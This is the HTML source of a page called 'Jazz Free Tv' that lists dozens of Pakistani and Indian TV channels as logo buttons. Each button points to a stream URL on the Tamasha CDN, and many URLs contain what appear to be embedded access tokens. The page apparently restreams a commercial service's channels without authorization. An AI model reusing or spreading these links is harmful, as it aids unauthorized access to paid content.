<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> </title>
<link href="https://niazitv.com/jtv/style.css" rel="stylesheet">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
		<script src="https://s0.2mdn.net/instream/video/client.js" async="" type="text/javascript"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
		<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css">
		<style>
			:root {
				--hfs: 2vmax;
				--primaryColor: red;
				--secondaryColor: black;
				--secondaryOpposite: white;
			}
			::-webkit-scrollbar {
				width: 0em;
				height: 0em;
			}
			::-webkit-scrollbar-thumb {
				background: var(--secondaryColor);
			}
			::-webkit-scrollbar-track {
				background: none;
			}
			* {
				-webkit-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}
			body {
				background-color: var(--secondaryColor);
			}

			.alignleft {
				float: left;
				margin-left: 5px;
				font-weight: bold;
				font-size: 15px;
			}

			.alignright {
				float: right;
				margin-right: 10px;
				color: var(--primaryColor);
				font-weight: normal;
                font-size: 25px;
			}

			h4 {
				margin-left: 5px;
				color: var(--primaryColor);
				font-weight: bold;
				font-size: 15px;
			}

			.nta {
				position: relative;
				overflow: hidden;
				color: var(--primaryColor);
			}

			div.scrollmenu {
				background-color: var(--secondaryColor);
				overflow: auto;
				white-space: nowrap;
				position: relative;
				overflow-y: hidden;
			}

			div.scrollmenu a {
				display: inline-block;
				color: var(--secondaryOpposite);
				text-align: center;
				padding: 4px;
				text-decoration: none;
			}

			div.scrollmenu a:hover {
				background-color: var(--secondaryColor);
			}

			.cen {
				position: relative;
				text-align: center;
				color: var(--secondaryOpposite);
			}

			.centered {
				font-size: var(--hfs);
				font-weight: bold;
				position: absolute;
				top: 80%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.cent {
				font-size: auto;
				position: absolute;
				top: 95%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.nt {
				width: 100px;
				border-radius: 10px;
				height: 120px;
				z-index: 1;
			}

			.mnt {
				width: 100px;
				border-radius: 2px;
				height: 100px;
			}
			.item img {
				border-radius: 10px;
			}
			#content-container {
				margin-bottom: 30px;
			}
			footer {
				display: grid;
				grid-gap: 0.5em;
				grid-template-columns: repeat(5, minmax(10px, 1fr));
				position: fixed;
				bottom: 0;
				left: 0;
				width: 100%;
				background-color: var(--secondaryColor);
				padding: 0px 4px 10px;
				justify-content: center;
				align-items: center;
                font-size:18px;
			}
			footer a {
				text-align: center;
				color: var(--primaryColor);
			}
			footer a:nth-child(3) i {
				background: var(--primaryColor);
				border-radius: 50%;
				padding: 10px 10px;
				color: var(--secondaryOpposite);
				margin-top: -40px;
				border: 2px solid var(--secondaryColor);
			}
		</style>


<style>::-webkit-scrollbar{
    display:none
}
*{
    -ms-overflow-style:none;
    scrollbar-width:none
}
body{
    margin:0;
    background:#f5f5f5;
    font-family:Arial,Helvetica,sans-serif;
    line-height:1.5;
    color:white;
    scroll-behavior:smooth;
    text-align:center;
}
#player-wrapper{
    width:100%;
    z-index:999;
}
.sticky{
    position:fixed;
    top:0;
    width:100%
}
#status{
    position:fixed;
    bottom:0;
    right:0;
    width:100%;
    background:#fff;
    display:none;
}
.col-sm-2{
    border-radius:4px
}
.sp{
    width:50%;
    height:12px;
    clear:both;
    margin:20px auto
}
.sp-texture{
    border:1px #000 solid;
    border-radius:4px;
    position:relative;
    background:linear-gradient(45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent),linear-gradient(-45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent);
    background-size:16px 16px;
    background-position:0 0;
    -webkit-animation:spTexture 1s infinite linear;
    animation:spTexture 1s infinite linear;
    color:#000;
    text-align:center;
    line-height:3em;
    font-family:roboto
}
@-webkit-keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
@keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
.heading{
    margin:5px auto;
    text-align:center
}
#rmpPlayer{
    z-index:999
}
.white{
    color:#fff
}
.red{
    color:red
}
.yellow{
    color:#ffdd40
}
footer{
    color:#fff;
    text-align:center
}
footer p{
    margin-bottom:20px;
    margin-top:-10px
}
.animated{
    font-family:sans;
    margin:0;
    padding:0;
    font-size:25px;
    background:url(https://upload.wikimedia.org/wikipedia/commons/3/3b/ColorRotateHr.gif) no-repeat;
    background-clip:text;
    -webkit-background-clip:text;
    color:transparent;
    animation:moveBg 40s linear infinite;
    -webkit-animation:moveBg 40s linear infinite
}
@keyframes moveBg{
    0%{
        background-position:0 30%
    }
    100%{
        background-position:100% 50%
    }
}
.blink{
    animation-name:blinker;
    animation-duration:1s;
    animation-timing-function:linear;
    animation-iteration-count:infinite
}
@keyframes blinker{
    0%{
        opacity:1
    }
    50%{
        opacity:0
    }
    100%{
        opacity:1
    }
}
*{
    -webkit-touch-callout:none;
    -webkit-user-select:none;
    -khtml-user-select:none;
    -moz-user-select:none;
    -ms-user-select:none;
    user-select:none
}
body{
    background:#000!important;
    overflow:hidden;
    color:white;
}
.parent{
    background:rgba(0,0,0,.9);
    font-family:"Source Sans Pro",sans-serif;
    margin:0;
    display:flex;
    align-items:center;
    justify-content:center;
    flex-direction:column;
    position:fixed;
    top:0;
    height:100%;
    width:100%;
    z-index:999999
}
.blobs-container{
    display:flex
}
.blob img{
    width:50%;
    display:none;
    margin:auto;
    margin-top:25px
}
.loading{
    color:#000;
    display:block;
    text-align:center;
    position:relative;
    top:30px;
    left:-2px;
    background:rgba(255,255,255,.9);
    padding:0 10px;
    border-radius:3px;
    width:80%;
    margin:auto;
    font-size:10px
}

.print{height:90px;
width:90px;

border-radius:5px;
border:1.5px solid #999;
padding:2px;
    margin:3px;

}
.print:hover{height:90px;
width:90px;
border:2px solid red;
border-radius:5px;webkit-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
box-shadow: 0px 3px 20px 3px rgba(255,0,0,100);}
.print:active{height:90px;
width:90px;
border:2px solid red;
border-radius:5px;
webkit-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
box-shadow: 0px 3px 20px 3px rgba(0,255,0,100);}
marquee{
border-radius: 6px 0px 0px  6px;
width: 90%;
border:2px solid red;
margin: auto;
   font-weight:bold;
   color:#fff;
display: block;}

.marquee span{display: inline-block;
 background: #ff0000;
 border-radius:  0px 6px 6px 0px;
  padding: 0px 10px;
   color: #fff;
   padding:2px;
   font-weight:bold;
    display: inline-block;
     float: right;
      width: auto;
       line-height: 35px;}
       .marquee marquee{display: block;
        line-height: 35px;
         z-index: -1; 
         margin-right: 10px;
          width: auto; 
          margin: auto;}
      
</style>

<link id="rmp-dress-code" type="text/css" rel="stylesheet" href="https://cdn.radiantmediatechs.com/rmp/5.9.2/css/rmp-s4.min.css"></head><body style="overflow: auto;">
	
	<div class="parent" id="loader" style="display: none;"><div class="blobs-container"><div class="blob"><img id="loader-image" src=""></div></div></div><div id="player-wrapper"><div id="rmpPlayer" ></div>

 
<div class="marquee yellow"><span><i class="fa fa-bell" style="font-size:26pt" aria-hidden="true"></i></span> <marquee scrollamount="5" direction="left" onmouseover="stop()" onmouseout="start()">Created By Riaz Hussain | Owner » 𝗦𝘆𝗻𝗰 𝗧𝗲𝗰𝗵 </> </marquee> </div> 



	<h2 class="animated" align="center"></h2><h4>Jazz Free Tv <span class="logoText"> </span></h4><div id="buttons-list" style="margin-top: 0px;">

 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Green_Entertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1702552123-logo.webp?id=17" ></span>
 
<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ARYdigital-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ary-digital-live-logo.webp?id=51" ></span>

<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/GeoEntertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/geo-entertainment-live.webp?id=98" ></span>

<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/humTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/HUM-TV-Channel-logo.webp?id=30" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ARYzindagi-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ary-zindagi-live-logo.webp?id=58" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/play-abr/playlist.m3u8"><img name=" Baby Tv " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/play-tv-live.webp?id=18" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AajEntertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/aaj-entertainment-live.webp?id=75" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/seeTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/see-tv-live.webp?id=71" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/urdu-1-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/urdu-1-live.webp?id=64" ></span>

 <span url="https://cdn12isb.tamashaweb.com:8087/jazzauth/AurLife-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1745518766547.webp?id=81">
              </span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/BolEntertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/bol-entertainment-live.webp?id=33" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ExpressEntertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/express-entertainment-live.webp?id=64" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/SabTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1686044497-logo.webp?id=59" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AAN-TV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1681977574-logo.webp?id=23" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/HumSitaray-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" humtv"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/HUM-Sitaray-Channel-logo.webp?id=27" ></span>

<span url="  https://cdn23lhr.tamashaweb.com:8087/YlUHeDQb7a/SetEntertainment-abr/live/vsat-setent-L/chunks.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1730720761397.webp?id=65" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/TVOne-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/tv-one-live.webp?id=92" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Aplus-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/a-plus-live.webp?id=86" ></span>
 
<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ktnEntertainment-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ktn-entertainment-live.webp?id=40" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/KashishTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/kashish-live.webp?id=12" ></span>
       
<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/sindhTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/sindh-tv-live.webp?id=56" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/LTNFamily-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" A Plus"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ltn-family-live.webp?id=49" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Apna-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/apna-tv-live.webp?id=61" ></span>

 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Colors-Rishtey-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1720519402699.webp?id=72" ></span>

 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Colors-HD-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1734518836641.webp?id=33" ></span>

 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Colors-Cineplex-HD-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1720189938582.webp?id=21" ></span>
 
 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Colors-Infinity-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1727720100748.webp?id=81" ></span>
 
<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/filmworld-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/filmworld-live.webp?id=27" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Filmax-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/filmax-live.webp?id=58" ></span>

	         <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ARYnews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1684242189-logo.webp?id=58" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/geoNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/geo-news-live.webp?id=80" ></span>



<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/humnews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/HUM-News-Channel-logo.webp?id=84" ></span>

 <span url="https://cdn12isb.tamashaweb.com:8087/jazzauth/Tamasha-News-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1744124970890.webp?id=100">
              </span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/samaaTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/samaa-tv-live.webp?id=13" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/BolNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/bol-news-live.webp?id=87" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/expressnews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/express-news-live.webp?id=84" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AajNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/aaj-news-live.webp?id=70" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ktnNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ktn-news-live.webp?id=41" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/SindhNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/sindh-tv-news-live.webp?id=30" ></span>

<span url="  https://cdn23lhr.tamashaweb.com:8087/jazzauth/PTVHome-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1750321510303.webp?id=52" ></span>


<span url="  https://cdn22lhr.tamashaweb.com:8087/jazzauth/PTVWorld-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1750322208140.webp?id=36" ></span>

 <span url="https://cdn22lhr.tamashaweb.com:8087/jazzauth/PTVNational-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1750322366525.webp?id=55">
              </span>

 <span url="https://cdn21lhr.tamashaweb.com:8087/jazzauth/PTVSports-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1750321954030.webp?id=31">
              </span>

 <span url="https://cdn23lhr.tamashaweb.com:8087/jazzauth/PTVNews-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1750321735602.webp?id=97">
              </span>


 <span url="https://cdn22lhr.tamashaweb.com:8087/jazzauth/365News-abr/playlist.m3u8"><img name="Sports HD" autofocus="" class="print" id="Sports-abr" src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1745518926422.webp?id=34">
              </span>

  <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/A1TV-abr/live/vsat-124L/chunks.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/a1-tv-live.webp?id=60" ></span>
  
 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/MTV-India-abr/live/MTV-India_360p/chunks.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1720189788666.webp?id=14" ></span>
 
<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/8xm-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/8xm-live.webp?id=92" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/jalwa-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/jalwa-tv-live.webp?id=82" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/MehranTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/mehran-tv-logo.webp?id=100" ></span>

 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Nick-Jr-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1729547438288.webp?id=32" ></span>
  
 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Nick-India-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1720190626301.webp?id=31" ></span>
 
 <span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Nick-Jr-Hindi-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/1729547557701.webp?id=77" ></span>
 
 <span url="  https://cdn07isb.tamashaweb.com:8087/YlUHeDQb7a/AnimalPlanet-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/20/2018_Animal_Planet_logo.svg/1200px-2018_Animal_Planet_logo.svg.png" ></span>
 
<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/cartoonnetwork-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hum masala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/cartoon-network-live.webp?id=41" ></span>


<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Minimax-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1702633459-logo.webp?id=70" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/BabyTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/baby-tv-live.webp?id=71" ></span>

  <span url="  https://cdn22lhr.tamashaweb.com:8087/jazzauth/Sonic-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1720191487512.webp?id=35" ></span>

<span url="https://cdn07isb.tamashaweb.com:8087/YlUHeDQb7a/157-3H/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/ten-sports-hd-logo.webp?id=64" ></span>

 
 <span url="  https://cdn06khi.tamashaweb.com:8087/YlUHeDQb7a/EPL-A-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/TMSH-1724158879315.webp?id=28" ></span>


<span url="  https://cdn22lhr.tamashaweb.com:8087/jazzauth/Eurosport-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1686912440-logo.webp?id=37" ></span>


<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AL-Jazeera-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1706163791-logo.webp?id=57" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/DawnNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/dawn-news-live.webp?id=44" ></span>

<span url=" https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Suno_News-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1709545345-logo.webp?id=42" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/NeoNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/neo-tv-live.webp?id=11" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Livecnn-abr/playlist.m3u8"><img name=" cnn " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/cnn-news-live.webp?id=34" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/hummasala-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" humtv"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/HUM-Masala-Channel-logo.webp?id=13" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/ABNnews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1686912075-logo.webp?id=10" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Madni-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/madani-channel-live.webp?id=59" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/abbtak-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/abb-takk-news-live.webp?id=78" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/GNN-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/gnn-live.webp?id=68" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/24News-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/channel-24-live.webp?id=60" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/SachTV/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/such-tv-live.webp?id=96" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/RozNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" Cartoon"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/roze-news-live.webp?id=92" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/DiscoveryPakistan-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/discover-pakistan-live-logo.webp?id=100" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/LahoreRung-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/lahore-rang-logo.webp?id=75" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/NewsOne-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/news-one-live.webp?id=32" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/PublicTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/public-news-live.webp?id=37" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AVTkhyberTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1685537734-logo.webp?id=53" ></span>

